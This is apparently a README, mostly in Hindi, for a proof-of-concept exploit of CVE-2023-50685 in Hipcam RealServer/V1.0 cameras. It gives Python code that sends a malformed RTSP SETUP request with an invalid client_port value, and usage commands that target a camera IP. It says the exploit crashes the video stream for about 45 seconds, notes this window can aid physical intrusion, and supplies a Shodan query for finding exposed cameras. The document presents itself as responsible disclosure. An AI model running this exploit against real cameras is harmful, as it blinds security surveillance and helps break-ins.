
This POC exploits a format validation vulnerability in the RTSP service of the Hipcam RealServer/V1.0, inducing a crash for approximately 45 seconds by injecting random data into the 'client_port' parameter during the RTSP SETUP request. Hipcam RealServer/V1.0 is used in many Hipcam Cameras. | CVE-2023-50685
Hipcam RealServer/V1.0 में RTSP सेवा प्रारूप सत्यापन भेद्यता के लिए Proof-of-Concept.
यह POC Hipcam RealServer/V1.0 के रियल टाइम स्ट्रीमिंग प्रोटोकॉल (RTSP) सेवा में एक प्रारूप सत्यापन भेद्यता का शोषण करता है, जो RTSP SETUP अनुरोध में 'client_port' पैरामीटर के अपर्याप्त इनपुट सत्यापन और हैंडलिंग के कारण उत्पन्न होती है।
RTSP SETUP अनुरोध में 'client_port' पैरामीटर के साथ छेड़छाड़ की जाती है, जिससे RTSP सर्वर के प्रारूप सत्यापन में एक भेद्यता उत्पन्न होती है। पारंपरिक शोषणों के विपरीत जिनमें एक विशिष्ट ओवरफ़्लो मान होता है, यह भेद्यता अनुचित स्वरूपण द्वारा ट्रिगर होती है, विशेष रूप से जब 'client_port' अपेक्षित स्वरूप में नहीं होता (जैसे, client_port=[custom_port]-[custom_port+1])। प्रारूप सत्यापन भेद्यताएँ तब होती हैं जब कोई एप्लिकेशन इनपुट को ठीक से मान्य या संभालने में विफल रहता है, जिससे अप्रत्याशित व्यवहार हो सकता है। इस मामले में, लक्ष्य सेवा को बाधित करना है।
cam_address = "rtsp://120.75.111.XX:554/11" #The RTSP port is normaly 554 with the path /11 which is also normaly used in Hipcam Cameras
random_data_value = 8712429 #It can be anything except the correct format of [custom_port]-[custom_port+1]
rtsp_request = f"SETUP {cam_address}/trackID=1 RTSP/1.0\r\nCSeq: 3\r\nTransport: RTP/AVP;unicast;client_port={random_data_value}\r\n\r\n"
python3 poc.py 120.75.111.XX 554
python3 poc.py -h
सफल शोषण के बाद, RTSP स्ट्रीम लगभग 45 सेकंड के लिए ऑफ़लाइन हो जाती है। इस व्यवधान का उपयोग भौतिक हमले के परिदृश्यों में किया जा सकता है जहाँ निगरानी फुटेज की अस्थायी अनुपलब्धता अनधिकृत पहुँच या अन्य दुर्भावनापूर्ण गतिविधियों के लिए अवसर प्रदान कर सकती है।
समयरेखा

देश

Hipcam RealServer के Shodan रुझान के बारे में अधिक जानकारी के लिए, Shodan Trends देखें।
उपयोग की गई खोज क्वेरी: has_screenshot:true port:554 "Hipcam RealServer/V1.0"।
यह स्क्रिप्ट केवल शैक्षिक और जिम्मेदार प्रकटीकरण उद्देश्यों के लिए है। उचित प्राधिकरण के बिना सिस्टम पर इस स्क्रिप्ट का अनधिकृत उपयोग अवैध और अनैतिक है। उपयोगकर्ता कानूनी और नैतिक मानकों का अनुपालन सुनिश्चित करने के लिए जिम्मेदार है।